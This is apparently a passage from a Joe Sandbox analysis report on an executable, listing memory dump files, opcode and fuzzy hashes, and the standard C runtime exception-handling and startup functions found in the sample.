          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e90efbfabbddd613c6c824727049bd3cf8f0c390fc7ab438ad8ac1b7e8215a00
          • Instruction ID: af8acb9432a75ba608548e648b891dbcae1e19a2f0172cea54cf5c75f8bbfd36
          • Opcode Fuzzy Hash: e90efbfabbddd613c6c824727049bd3cf8f0c390fc7ab438ad8ac1b7e8215a00
          • Instruction Fuzzy Hash: 35A10031A006458BE714CF68C4807EEB3F1FF89350F09867DC85AA7761E778A94ACB14
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 61ba97cf0cbd44114090423b4466df32191acfd61c1f6e4ef0718f483b3d3a2e
          • Instruction ID: 9dafb67b6c3d658eb2a0c49260b54935959dac2ae9e5cd256a4f53e9d137e0bf
          • Opcode Fuzzy Hash: 61ba97cf0cbd44114090423b4466df32191acfd61c1f6e4ef0718f483b3d3a2e
          • Instruction Fuzzy Hash: 0351C134A102288ADF649F64C550BFFB3F0EF4A305F5195BACD4A97281EB344D86CB56
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e4182ae9eb8838e8c5c5b135857153592dc5964a2e95149793ace3083c1df033
          • Instruction ID: 6871140e6415c40a60e6ca7c5a51c78d71a166f7473c451371417ed2e384d2a2
          • Opcode Fuzzy Hash: e4182ae9eb8838e8c5c5b135857153592dc5964a2e95149793ace3083c1df033
          • Instruction Fuzzy Hash: B0515EB1D00205CFFB68CF59D8817AEB7F6FB48354F28842AD455EB251D7B99980CB90
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: efc5aa055f2b7d5c860130e1e71fece82e33114b5bdf1545e64ec11c16537c2c
          • Instruction ID: 9415cac03281c6ec82b21f1654163c9b8f57b89c1c09bba3481c8231016924ff
          • Opcode Fuzzy Hash: efc5aa055f2b7d5c860130e1e71fece82e33114b5bdf1545e64ec11c16537c2c
          • Instruction Fuzzy Hash: 6F41D131A006459FC764CF69C98166BFBF5FF85302F48856ED986D7781C634EA4ACB10
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b9005a4da64ab163c50eb2dcc20d1c1bb872def61d52f9ba0cb331cade9619df
          • Instruction ID: fcf51d1f5d1f1bba21e41b73682814bc6cd762a08b2e0561bef0e2f7cd55deb4
          • Opcode Fuzzy Hash: b9005a4da64ab163c50eb2dcc20d1c1bb872def61d52f9ba0cb331cade9619df
          • Instruction Fuzzy Hash: AF2156309140B54A875C8B2DAC22473FBD0AF4621338B42AFD99AEA0C2C53DD565DBA0
          APIs
          • IsInExceptionSpec.LIBVCRUNTIME ref: 00061EC8
          • type_info::operator==.LIBVCRUNTIME ref: 00061EEA
          • ___TypeMatch.LIBVCRUNTIME ref: 00061FF9
          • IsInExceptionSpec.LIBVCRUNTIME ref: 000620CB
          • CallUnexpected.LIBVCRUNTIME ref: 0006216A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
          • String ID: csm$csm$csm
          • API String ID: 4162181273-393685449
          • Opcode ID: 8a53b0d1a5046381f7300a7b12b460322ba65a1f7aa2f50502cc9b10221c16d0
          • Instruction ID: a3c2290ca15aaca3580e72aebb611cb5cdc9e241f0daba9c72f851f7da22fc9b
          • Opcode Fuzzy Hash: 8a53b0d1a5046381f7300a7b12b460322ba65a1f7aa2f50502cc9b10221c16d0
          • Instruction Fuzzy Hash: 0EB1A731C00609EFDF28DFA4C8819EEBBB6BF18310F18416AE9156B212D731EA51CF91
          APIs
          • _ValidateLocalCookies.LIBCMT ref: 00061777
          • ___except_validate_context_record.LIBVCRUNTIME ref: 0006177F
          • _ValidateLocalCookies.LIBCMT ref: 00061808
          • __IsNonwritableInCurrentImage.LIBCMT ref: 00061833
          • _ValidateLocalCookies.LIBCMT ref: 00061888
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
          • String ID: csm
          • API String ID: 1170836740-1018135373
          • Opcode ID: 030f32e8edd596a0a58e31beedf78c30e2b57a1602427b47a82485cffea35743
          • Instruction ID: 2dde9b1bb5ab8607a979b4349b62c5905086e553fc2f60f0d137edb3ce45b464
          • Opcode Fuzzy Hash: 030f32e8edd596a0a58e31beedf78c30e2b57a1602427b47a82485cffea35743
          • Instruction Fuzzy Hash: E241D234E00209AFCF20DF68C881ADEBBF6FF45324F188155E8199B392CB759A55CB91
          APIs
          • __CreateFrameInfo.LIBCMT ref: 00707769
            • Part of subcall function 00707051: __getptd.LIBCMT ref: 0070705F
            • Part of subcall function 00707051: __getptd.LIBCMT ref: 0070706D
          • __getptd.LIBCMT ref: 00707773
            • Part of subcall function 006FF027: __amsg_exit.LIBCMT ref: 006FF037
          • __getptd.LIBCMT ref: 00707781
          • __getptd.LIBCMT ref: 0070778F
          • __getptd.LIBCMT ref: 0070779A
          • _CallCatchBlock2.LIBCMT ref: 007077C0
            • Part of subcall function 007070F6: __CallSettingFrame@12.LIBCMT ref: 00707142
            • Part of subcall function 00707867: __getptd.LIBCMT ref: 00707876
            • Part of subcall function 00707867: __getptd.LIBCMT ref: 00707884
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
          • String ID:
          • API String ID: 3688206559-0
          • Opcode ID: 334ecc6cb648cf23f6d847abb4754ee2921b181d714db18bc2a8a50ce01219b6
          • Instruction ID: ece3f4f4cc7ae3a9e7fca3472c7cdaec06ab3a411884685c0695e8241fe7e405
          • Opcode Fuzzy Hash: 334ecc6cb648cf23f6d847abb4754ee2921b181d714db18bc2a8a50ce01219b6
          • Instruction Fuzzy Hash: F911E9B1C00249EFDB44EFA4D44AAAE7BF1FF08314F108169F914A7292DB799A11DF64
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: __getptd$__amsg_exit
          • String ID: MOC$csm
          • API String ID: 1969926928-1389381023
          • Opcode ID: b68e641eb07ff4fafb1edb55a21d12150c63f4870366f27caff06bbc5fcb7995
          • Instruction ID: 173ee481bdc4ea0acae7995d41cdb3a853ca951ecd2ae44971406aa00cfa24ae
          • Opcode Fuzzy Hash: b68e641eb07ff4fafb1edb55a21d12150c63f4870366f27caff06bbc5fcb7995
          • Instruction Fuzzy Hash: 8EE01A31904158CFC754AB64C086B2836D5FF45314F1501A5AA4CC7263CF39EC509662
          APIs
          • _ValidateScopeTableHandlers.LIBCMT ref: 007082F1
          • __FindPESection.LIBCMT ref: 0070830B
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: FindHandlersScopeSectionTableValidate
          • String ID:
          • API String ID: 876702719-0
          • Opcode ID: b1f007dde887acc725995a8bacf750f679cadae1ffe26ed1d54dc4f4b23db847
          • Instruction ID: e26e143b0c905dcf6395fb32c51b25e9a8c01aba829328eb8dfa9b7b6e0fa7be
          • Opcode Fuzzy Hash: b1f007dde887acc725995a8bacf750f679cadae1ffe26ed1d54dc4f4b23db847
          • Instruction Fuzzy Hash: F791B136A00605CBCB54CF58D8446ADB7F5FB84710F158329E895D73E1EB39EC16CA92
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: _parse_cmdline
          • String ID: @$q$C:\Users\user\Desktop\vk2wTOx91s.exe
          • API String ID: 439573244-648640433
          • Opcode ID: 946a5b4bb00e147c92b16e7c9cc163cd79a488b86947ea21c061b1e70194a95b
